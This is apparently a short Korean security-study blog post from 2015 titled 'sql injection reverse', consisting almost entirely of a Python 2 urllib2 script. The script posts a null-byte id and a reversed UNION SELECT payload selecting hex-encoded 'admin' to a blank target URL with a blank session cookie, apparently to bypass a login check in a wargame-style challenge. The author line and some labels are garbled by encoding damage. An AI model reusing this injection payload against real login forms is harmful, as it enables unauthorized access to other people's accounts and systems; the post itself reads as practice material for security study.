Security Study/Source
sql injection reverse
๐๐พ๐ฌ๐ฎ๐ฝ๐ฎ_๐ข๐ฝ๐ฎ๐ต๐ต๐ช
2015. 11. 21. 13:30
728x90
๋ฐ์ํ
- import urllib
- import urllib2
- url = ""
- req = urllib2.Request(url)
- sql = "union select 0x61646D696E 32%"
- data = "id=%00&pw=" + sql[::-1]
- #data = urllib.urlencode(data)
- req = urllib2.Request(url, data)
- req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36')
- req.add_header('Cookie', 'PHPSESSID=')
- response = urllib2.urlopen(req)
- headers = response.info().headers
- the_page = response.read()
- print the_page
728x90
๋ฐ์ํ